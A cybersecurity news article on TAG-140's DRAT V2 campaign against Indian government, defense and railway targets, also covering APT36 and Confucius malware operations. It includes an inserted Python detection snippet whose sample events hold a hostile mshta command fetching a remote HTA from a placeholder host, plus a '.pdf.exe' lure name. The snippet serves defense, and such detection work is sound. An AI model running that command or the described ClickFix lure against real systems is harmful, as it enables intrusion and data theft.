TAG-140 deploys DRAT V2 RAT targeting the Indian government, defense and railway sectors

By user, July 7, 2025

A hacking group with ties to Pakistan has been found targeting Indian government organizations with a modified variant of a remote access trojan (RAT) known as DRAT.

The activity is attributed to a threat actor tracked as TAG-140 by Recorded Future's Insikt Group, which says it overlaps with SideCopy, an adversarial collective assessed to be an operational sub-cluster within Transparent Tribe (a.k.a. APT-C-56, APT36, Datebug, Earth Karkaddan, Mythic Leopard, and Operation C-Major).

“TAG-140 has consistently demonstrated iterative advancement and variety in its malware arsenal and delivery techniques,” the Mastercard-owned company said in an analysis published last month.

“This latest campaign, which spoofed the Indian Ministry of Defence via a cloned press release portal, marks a slight but notable shift in both malware architecture and command-and-control (C2) functionality.”

The updated version of DRAT, dubbed DRAT V2, is the latest addition to SideCopy's RAT arsenal, which also infects Windows and Linux systems with other tools such as Action RAT, AllaKore RAT, Ares RAT, CurlBack RAT, ReverseRAT, Spark RAT, and Xeno RAT.

The attack activity shows the adversary's evolving playbook and highlights its ability to refine and diversify a “replaceable suite” of RAT malware in order to harvest sensitive data and complicate attribution, detection, and monitoring efforts.


According to the threat intelligence firm, the attacks have broadened their targeting beyond the government, defense, maritime, and academic sectors to encompass the country's railways, oil and gas companies, and organizations affiliated with the Ministry of Foreign Affairs. The group is known to have been active since at least 2019.

The infection sequence documented by Recorded Future uses a ClickFix-style approach that spoofs the official press release portal of India's Ministry of Defence to drop a new Delphi-compiled variant of the originally .NET-based DRAT.

The forged website contains a single active link that, when clicked, silently copies a malicious command to the machine's clipboard and prompts the victim to open a command shell, paste the command, and run it, which starts the infection sequence.

This retrieves an HTML Application (HTA) file from an external server (“trade4wealth[.]in”) that is executed by mshta.exe to launch a loader called BroaderAspect. The loader is responsible for downloading and opening a decoy PDF, setting up persistence via changes to the Windows Registry, and downloading and running DRAT V2 from the same server.

DRAT V2 adds a new command for arbitrary shell command execution, increasing its post-exploitation flexibility. It also uses Base64 encoding to obfuscate C2 IP addresses and updates the custom server-initiated TCP protocol to accept command input in both ASCII and Unicode, although the server responds only in ASCII. The original DRAT required Unicode for both input and output.

“Compared to its predecessor, DRAT V2 likely reduces string obfuscation by keeping most command headers in plaintext, perhaps prioritizing reliability over stealth,” Recorded Future said. “DRAT V2 lacks advanced anti-analysis techniques and relies on basic infection and persistence methods, making it detectable through static and behavioral analysis.”

Other known features allow the operators to perform a wide range of actions on compromised hosts, including conducting reconnaissance, uploading additional payloads, and exfiltrating data.

“These features provide TAG-140 with persistent and flexible control over infected systems, enabling both automated and interactive post-exploitation activity without the need to deploy auxiliary malware tools,” the company said.

“DRAT V2 appears to be another modular addition rather than a definitive evolution, reinforcing the likelihood that TAG-140 will continue rotating RATs across campaigns to obscure signatures and maintain operational flexibility.”

APT36 campaign delivers Ares RAT and DISGOMOJI

State-sponsored threat activity and coordinated hacktivist operations from Pakistan surged during the India-Pakistan conflict in May 2025, with APT36 taking advantage of the event to distribute Ares RAT in attacks targeting the defense, government, IT, education, and communications sectors.

“Deploying tools like Ares RAT has allowed attackers to gain full remote access to infected systems, opening the door to surveillance, data theft, and potentially the disruption of critical services,” Seqrite Labs said in May 2025.

A recent APT36 campaign has also been observed spreading carefully crafted phishing emails with malicious PDF attachments targeting Indian defense personnel.

The message poses as a purchase order from the National Informatics Centre (NIC) and urges the recipient to click a button embedded in the PDF document. Doing so downloads an executable that, at a glance, looks like a legitimate PDF to Windows users because it carries a PDF icon and a double-extension filename (i.e., *.pdf.exe).
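As an added illustration that is not part of the original report, the following Python snippet shows how a defender might flag in process-creation telemetry the two initial-execution artifacts described on this page: the ClickFix hand-off in which mshta.exe fetches a remote HTA after the victim pastes a command into a shell, and the double-extension *.pdf.exe lure. The event format, the hostname lure.example and all file names are constructed samples, not indicators from the report.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry);
# host and file names are placeholders, not indicators from the report.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"mshta.exe https://lure.example/press-release.hta"},
    {"id": 2, "image": r"C:\Users\v\Downloads\Purchase_Order.pdf.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Users\v\Downloads\Purchase_Order.pdf.exe"},
    {"id": 3, "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"mshta.exe C:\Windows\System32\local.hta"},
]

REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)
# Shells a ClickFix lure tells the victim to paste into, plus explorer.exe
# (the parent when the command is pasted into the Win+R Run box).
PASTE_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "explorer.exe"}
DOC_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".txt"}
DOUBLE_EXT = re.compile(r"(\.[a-z0-9]{2,5})\.(exe|scr|com|pif)$")

def basename(path):
    """Last component of a Windows path."""
    return path.rsplit("\\", 1)[-1]

def triage_event(ev):
    """Return (rule, severity) findings for one process-creation event."""
    findings = []
    image = basename(ev["image"]).lower()
    parent = basename(ev["parent"]).lower()
    if image == "mshta.exe" and REMOTE_URL.search(ev["cmdline"]):
        # mshta fetching a remote HTA is the hand-off in the ClickFix chain; a
        # shell or Run-box parent matches the paste-and-run lure, so rank higher.
        sev = "high" if parent in PASTE_PARENTS else "medium"
        findings.append(("mshta_remote_hta", sev))
    m = DOUBLE_EXT.search(image)
    if m and m.group(1) in DOC_EXTS:
        # Document extension hidden in front of an executable one (e.g. .pdf.exe).
        findings.append(("double_extension_executable", "high"))
    return findings

def triage(events):
    """Map event id -> findings for every event that triggered at least one rule."""
    return {ev["id"]: f for ev in events if (f := triage_event(ev))}
```

Event 3 (a local HTA launched from explorer.exe) deliberately produces no finding, so the rules key on the remote fetch rather than on mshta.exe alone.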

Besides featuring anti-debugging and anti-VM checks to sidestep analysis, the binary is designed to launch a next-stage payload in memory that enumerates files, logs keystrokes, captures clipboard content, harvests browser credentials, and contacts the C2 server for data exfiltration and remote access.

“APT36 poses a critical and continuous cyber threat to national security, particularly targeting India's defense infrastructure,” Cyfirma said. “The group's use of advanced phishing tactics and credential theft exemplifies the evolving sophistication of modern cyber espionage.”


Another campaign, detailed by the 360 Threat Intelligence Center, leveraged a new variant of Go-based malware called DISGOMOJI delivered as a booby-trapped ZIP file via phishing attacks. According to the Beijing-based cybersecurity company, the malware is an ELF executable written in Golang that uses Google Cloud for C2, indicating a migration away from Discord.

“In addition, a browser-stealing plugin and remote management tools are downloaded to enable further theft operations and remote control,” it said. “The download capability of this DISGOMOJI variant is similar to previously seen payloads, but whereas DISGOMOJI earlier used a Discord server, this time Google Cloud services were used for communication.”

Confucius drops WooperStealer and Anondoor

The findings coincide with the discovery of a new campaign by a cyber espionage actor known as Confucius that deploys an information stealer called WooperStealer and a previously undocumented modular backdoor dubbed Anondoor.

Confucius is assessed to be a threat group operating with objectives aligned with India. It is believed to have been active since at least 2013 and targets governments and militaries in South and East Asia.

According to Seebug's Knownsec 404 Team, the multi-stage attacks use Windows shortcut (LNK) files to deliver Anondoor via DLL side-loading.

The backdoor is fully functional, allowing attackers to run commands, take screenshots, download files, issue commands that allow them to dump passwords from the Chrome browser, and list files and folders.

“It has evolved from a previously exposed single-purpose spyware trojan into a modular backdoor,” the team said. “Its backdoor component is encapsulated in a C# DLL file and evades sandbox detection by calling and loading the specified method.”
